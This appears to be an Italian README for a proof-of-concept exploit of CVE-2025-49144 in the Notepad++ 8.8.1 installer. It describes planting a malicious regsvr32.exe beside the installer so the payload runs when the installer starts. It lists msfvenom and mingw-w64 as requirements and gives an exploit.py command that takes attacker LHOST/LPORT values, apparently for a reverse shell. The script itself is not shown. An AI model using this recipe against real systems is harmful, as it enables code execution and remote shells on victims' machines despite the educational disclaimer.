
Prova di Concetto (PoC) che sfrutta la vulnerabilità CVE-2025-49144 nel programma di installazione di Notepad++ 8.8.1.
Questo repository contiene un Proof of Concept (PoC) funzionale che sfrutta la vulnerabilità CVE-2025-49144 nell'installer di Notepad++ 8.8.1. L'esecuzione dannosa avviene posizionando un binario (regsvr32.exe) nella stessa directory dell'installer vulnerabile. Quando l'installer viene eseguito, eredita il contesto e attiva il payload.
⚠️ Disclaimer
Questo codice è strettamente destinato esclusivamente a scopi educativi e di ricerca. L'uso non autorizzato su sistemi senza esplicita autorizzazione può costituire una violazione della legge.
L'autore non è responsabile per qualsiasi uso improprio o attività malevola che coinvolga questo strumento.
msfvenom (parte di Metasploit Framework)mingw-w64 (x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe (deve essere posizionato manualmente nella stessa directory)python3 exploit.py -i <LHOST> -p <LPORT>
Esempio:
python3 exploit.py -i 192.168.100.10 -p 4444
Questo genererà i seguenti file:
[
]